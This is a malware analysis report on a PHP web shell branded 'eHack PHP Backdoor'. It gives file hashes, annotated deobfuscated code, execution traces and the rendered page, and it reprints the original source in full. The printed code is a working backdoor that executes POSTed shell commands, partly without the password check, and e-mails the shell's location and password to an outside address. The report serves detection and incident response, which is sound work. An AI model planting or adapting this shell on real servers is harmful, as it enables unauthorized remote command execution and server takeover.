PHP Malware Analysis

dir (2).php, dir.php.jpg

md5: e0627b12c76b00b2a90c2b9f3df67f4c


Deobfuscated PHP code

<?php
// Analyst notes: single-file PHP web shell. This top block implements the
// password gate and a call-home e-mail; the inline PHP further down the page
// executes the attacker-supplied command and renders its output.

// Hard-coded shell password and the address the call-home notice is sent to.
$password = "hack.co.id";
$email = "teguh@hack.co.id";
session_start();
// Login path: the submit button is named "password", the secret is in "pass".
// A falsy "pass" value (empty string, "0") never reaches the comparison.
if (isset($_POST['password']) && $_POST['pass']) {
    $pass = $_POST['pass'];
    // Loose (==) comparison against the fixed secret.
    if ($pass == $password) {
        // Call-home: on each successful login the operator is e-mailed the
        // shell's location (SERVER_NAME + REQUEST_URI), the password, the
        // logging-in client's IP and a timestamp. Subject is the resolved
        // server IP plus HTTP_HOST. Detection: a mail() hand-off (typically the
        // local sendmail path) from the web server user whose body starts with
        // "Link: " and is addressed to the $email above.
        $time_shell = "" . date("d/m/Y - H:i:s") . "";
        $ip_remote = $_SERVER["REMOTE_ADDR"];
        $from_shellcode = 'shell@' . gethostbyname($_SERVER['SERVER_NAME']) . '';
        $to_email = $email;
        $server_mail = "" . gethostbyname($_SERVER['SERVER_NAME']) . "  - " . $_SERVER['HTTP_HOST'] . "";
        $linkcr = "Link: " . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . " Password : {$password} - IP Excuting: {$ip_remote} - Time: {$time_shell}";
        // From/Reply-to header pair; note the folded "\r\n Reply-to:" (leading space).
        $header = "From: {$from_shellcode}\r\n Reply-to: {$from_shellcode}";
        mail($to_email, $server_mail, $linkcr, $header);
        // The submitted value is stored in the session and re-compared below on every request.
        $_SESSION['password'] = $pass;
    } else {
        // Only set on a failed login; echoed in the login form further down.
        $error = "Incorrect password";
    }
}
// Logout via GET ?logout. header() is not followed by exit, so the rest of
// the page still executes for this request.
if (isset($_GET['logout'])) {
    unset($_SESSION['password']);
    header("Location: ?");
}
?>

<html>
<title>eHack PHP Backdoor</title>
<link rel="shortcut icon" href="https://cdn.teguh.co/images/favicon.png">
<link href='https://fonts.googleapis.com/css?family=Oswald' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Open+Sans' rel='stylesheet' type='text/css'>
<link rel="stylesheet" href="https://cdn.teguh.co/css/hack.css">
</head>

<body>
<div align="center">  
<pre>
  ___ ___                __    
 /   |   \_____    ____ |  | __
/    ~    \__  \ _/ ___\|  |/ /
\    Y    // __ \\  \___|    < 
 \___|_  /(____  /\___  >__|_ \
             \/      \/     \/     \/.co.id
</pre>
</div> 

<div class="wrapper">
  <div class="panel panel-default">  

  <h1>eHack PHP BACKDOOR</h1>
  <center><p><?php 
// Host fingerprint disclosure: first 120 chars of php_uname() are printed to
// every visitor, authenticated or not.
echo substr(php_uname(), 0, 120);
?></p></center>
  <?php 
// Command execution. NOTE(review): this runs BEFORE the session check below,
// so any POST carrying a non-empty "command" field is executed regardless of
// the password; the gate only controls what is rendered. For detection/IR,
// treat every POST with a "command" field to this file as a command run, not
// only those that follow a login.
if (!empty($_POST['command'])) {
    $command = shell_exec($_POST['command']);
}
// Second session_start() in the same request (the first is at the top of the file).
session_start();
// Authenticated check: loose comparison of the session value with the fixed
// secret. On a fresh session the key is unset, which fails the check.
if ($_SESSION['password'] == $password) {
    ?>
  <form  method="post" action="">
    <input type="text" class="command" placeholder="Please enter your command" name="command" id="command" value="<?php 
    // Echoes the submitted command back into the form, HTML-escaped.
    echo htmlspecialchars($_POST['command']);
    ?>" required>
    <div>
      <p class="name-help">Please enter your command</p>
    </div>
    <input type="submit" class="submit" value="Run">  
  </form>
    <?php 
    // $command is only assigned when a command was submitted above; on a
    // plain GET this reads an undefined variable (falsy).
    if ($command) {
        ?>
        <div>
             <div align="center"><h1> Result </h1></div>
        </div><br>
        <textarea rows="10">
<?php 
        // Raw shell_exec() output, HTML-escaped into the textarea.
        echo htmlspecialchars($command);
        ?>
        </textarea>
<?php 
    // A POST whose command produced no output (or where shell_exec returned
    // null/false) lands here.
    } elseif (!$command && $_SERVER['REQUEST_METHOD'] == 'POST') {
        ?>
        <div>
            <center><h1> Result </h1></center>
        </div><br>
        <textarea rows="10">Oops, there is no result
<?php 
    }
    ?>
        </textarea><br>
        <form method="post" action="" id="logout_form">
        <div align="center"><a href="?logout" id="confirm">LOGOUT</a></div>
 </form>
<?php 
// Unauthenticated view: the login form.
} else {
    ?>
<form  method="post" action="">
    <input type="password" class="password" placeholder="Password" name="pass">
    <input type="submit" name="password" class="submit" value="login">
    <div align="center"><br><p><?php 
    // $error is only defined after a failed login attempt in this request.
    echo $error;
    ?></p></div>
</form>
<?php 
}
?>
</div>
</div>
<div align="center"><p>Made with <span style="color: #e25555;">&hearts;</span> by <a href="https://teguh.co">Teguh Aprianto</a></p></div>
</body>


</html>

Execution traces

data/traces/e0627b12c76b00b2a90c2b9f3df67f4c_trace-1676241840.6414.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:44:26.539203]
1	0	1	0.000150	393528
1	3	0	0.000267	408472	{main}	1		/var/www/html/uploads/dir.php.jpg	0	0
1		A						/var/www/html/uploads/dir.php.jpg	2	$password = 'hack.co.id'
1		A						/var/www/html/uploads/dir.php.jpg	3	$email = 'teguh@hack.co.id'
2	4	0	0.000309	408472	session_start	0		/var/www/html/uploads/dir.php.jpg	4	0
2	4	1	0.000362	409224
2	4	R			TRUE
2	5	0	0.000379	409224	php_uname	0		/var/www/html/uploads/dir.php.jpg	59	0
2	5	1	0.000394	409336
2	5	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	6	0	0.000413	409336	substr	0		/var/www/html/uploads/dir.php.jpg	59	3	'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'	0	120
2	6	1	0.000431	409432
2	6	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	7	0	0.000450	409224	session_start	0		/var/www/html/uploads/dir.php.jpg	64	0
2	7	1	0.000479	409224
2	7	R			TRUE
1	3	1	0.000519	409224
			0.000550	314992
TRACE END   [2023-02-12 20:44:26.539632]

data/traces/e0627b12c76b00b2a90c2b9f3df67f4c_trace-1676247127.5523.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:12:33.450152]
1	0	1	0.000183	393528
1	3	0	0.000332	408472	{main}	1		/var/www/html/uploads/dir (2).php	0	0
1		A						/var/www/html/uploads/dir (2).php	2	$password = 'hack.co.id'
1		A						/var/www/html/uploads/dir (2).php	3	$email = 'teguh@hack.co.id'
2	4	0	0.000386	408472	session_start	0		/var/www/html/uploads/dir (2).php	4	0
2	4	1	0.000452	409224
2	4	R			TRUE
2	5	0	0.000475	409224	php_uname	0		/var/www/html/uploads/dir (2).php	59	0
2	5	1	0.000494	409336
2	5	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	6	0	0.000520	409336	substr	0		/var/www/html/uploads/dir (2).php	59	3	'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'	0	120
2	6	1	0.000545	409432
2	6	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	7	0	0.000571	409224	session_start	0		/var/www/html/uploads/dir (2).php	64	0
2	7	1	0.000610	409224
2	7	R			TRUE
1	3	1	0.000644	409224
			0.000680	314992
TRACE END   [2023-02-12 22:12:33.450684]


Generated HTML code

<html><head><title>eHack PHP Backdoor</title>
<link rel="shortcut icon" href="https://cdn.teguh.co/images/favicon.png">
<link href="https://fonts.googleapis.com/css?family=Oswald" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" type="text/css">
<link rel="stylesheet" href="https://cdn.teguh.co/css/hack.css">
</head>

<body>
<div align="center">  
<pre>  ___ ___                __    
 /   |   \_____    ____ |  | __
/    ~    \__  \ _/ ___\|  |/ /
\    Y    // __ \\  \___|    &lt; 
 \___|_  /(____  /\___  &gt;__|_ \
             \/      \/     \/     \/.co.id
</pre>
</div> 

<div class="wrapper">
  <div class="panel panel-default">  

  <h1>eHack PHP BACKDOOR</h1>
  <center><p>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</p></center>
  <form method="post" action="">
    <input type="password" class="password" placeholder="Password" name="pass">
    <input type="submit" name="password" class="submit" value="login">
    <div align="center"><br><p></p></div>
</form>
</div>
</div>
<div align="center"><p>Made with <span style="color: #e25555;">♥</span> by <a href="https://teguh.co">Teguh Aprianto</a></p></div>



</body></html>

Original PHP code

<?php
$password = "hack.co.id";
$email = "teguh@hack.co.id";
session_start();

if(isset($_POST['password']) && $_POST['pass']){
    $pass=$_POST['pass'];
 
  if($pass== $password){

    $time_shell = "".date("d/m/Y - H:i:s").""; 
    $ip_remote = $_SERVER["REMOTE_ADDR"]; 
    $from_shellcode = 'shell@'.gethostbyname($_SERVER['SERVER_NAME']).''; 
    $to_email = $email; 
    $server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])."  - ".$_SERVER['HTTP_HOST']."";
    $linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." Password : $password - IP Excuting: $ip_remote - Time: $time_shell"; $header = "From: $from_shellcode\r\n Reply-to: $from_shellcode"; 
    mail($to_email, $server_mail, $linkcr, $header); 

    $_SESSION['password']=$pass;
  }

else {

    $error="Incorrect password";
  }

  }

  if(isset($_GET['logout'])){
    unset($_SESSION['password']);
    header("Location: ?");
  }
?>

<html>
<title>eHack PHP Backdoor</title>
<link rel="shortcut icon" href="https://cdn.teguh.co/images/favicon.png">
<link href='https://fonts.googleapis.com/css?family=Oswald' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Open+Sans' rel='stylesheet' type='text/css'>
<link rel="stylesheet" href="https://cdn.teguh.co/css/hack.css">
</head>

<body>
<div align="center">  
<pre>
  ___ ___                __    
 /   |   \_____    ____ |  | __
/    ~    \__  \ _/ ___\|  |/ /
\    Y    // __ \\  \___|    < 
 \___|_  /(____  /\___  >__|_ \
             \/      \/     \/     \/.co.id
</pre>
</div> 

<div class="wrapper">
  <div class="panel panel-default">  

  <h1>eHack PHP BACKDOOR</h1>
  <center><p><?php echo substr(php_uname(),0,120);?></p></center>
  <?php
    if (!empty($_POST['command'])) {
    $command = shell_exec($_POST['command']);
  }
    session_start();
    if($_SESSION['password']== $password)
{
 ?>
  <form  method="post" action="">
    <input type="text" class="command" placeholder="Please enter your command" name="command" id="command" value="<?= htmlspecialchars($_POST['command']) ?>" required>
    <div>
      <p class="name-help">Please enter your command</p>
    </div>
    <input type="submit" class="submit" value="Run">  
  </form>
    <?php if ($command): ?>
        <div>
             <div align="center"><h1> Result </h1></div>
        </div><br>
        <textarea rows="10">
<?= htmlspecialchars($command) ?>
        </textarea>
<?php elseif (!$command && $_SERVER['REQUEST_METHOD'] == 'POST'): ?>
        <div>
            <center><h1> Result </h1></center>
        </div><br>
        <textarea rows="10">Oops, there is no result
<?php endif; ?>
        </textarea><br>
        <form method="post" action="" id="logout_form">
        <div align="center"><a href="?logout" id="confirm">LOGOUT</a></div>
 </form>
<?php
}
else
{
?>
<form  method="post" action="">
    <input type="password" class="password" placeholder="Password" name="pass">
    <input type="submit" name="password" class="submit" value="login">
    <div align="center"><br><p><?php echo $error; ?></p></div>
</form>
<?php 
}
?>
</div>
</div>
<div align="center"><p>Made with <span style="color: #e25555;">&hearts;</span> by <a href="https://teguh.co">Teguh Aprianto</a></p></div>
</body>


</html>